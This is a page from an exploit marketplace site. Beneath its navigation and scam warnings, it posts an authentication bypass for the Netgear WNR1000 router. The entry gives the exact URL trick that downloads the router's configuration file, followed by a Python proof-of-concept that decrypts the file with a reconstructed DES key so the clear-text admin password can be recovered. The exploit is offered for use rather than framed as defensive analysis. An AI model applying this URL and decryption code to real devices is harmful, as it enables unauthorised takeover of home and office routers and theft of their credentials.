0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Netgear WNR1000 - Authentication Bypass
The web server running on the affected devices is subject to an authentication bypass issue that allows attacker to gain administrative access, circumventing existing authentication mechanisms. Strictly speaking, the web server skips authentication checks for some URLs, such as those that contain the substring ".jpg" (without quotes). As a consequence, an attacker can retrieve the current device configuration by accessing the following URL: http://<target-ip-address>/NETGEAR_fwpt.cfg?.jpg The resulting configuration file is encrypted. However the device implements a trivial encryption scheme, that can be reversed quite easily. From the configuration file, attackers can extract, among the other things, the clear-text password for the "admin" user. A Python procedure that implements the aforementioned encryption scheme follows (the code of this PoC is inefficient and is quite a mess): <cut> import pyDes import os, sys # Encryption key is a slightly variation of "NtgrBak" KEY = [0x56-8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00] def derive_des_key(ascii_key): def extract_by_offset(offset): byte_index = offset >> 3 bit_index = byte_index << 3 v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index+1] v1 = 8 - (offset - bit_index) v0 >>= v1 return v0 & 0xfe k = "" for i in range(0, 7*8, 7): k += chr(extract_by_offset(i)) return k def decrypt_block(block, key_bytes): k = derive_des_key(key_bytes) des = pyDes.des(k, pyDes.ECB) r = des.decrypt(block) return r def main(): data = sys.stdin.read() assert (len(data) % 8) == 0 current_key = KEY[:] r = "" for i in range(0, len(data), 8): current_key[0] += 8 if current_key[0] > 0xff: current_key[0] = current_key[0] - 0x100 current_key[1] += 1 block = data[i:i+8] d = decrypt_block(block, current_key) r += d sys.stdout.write(r) </cut> # 0day.today [2024-09-28] #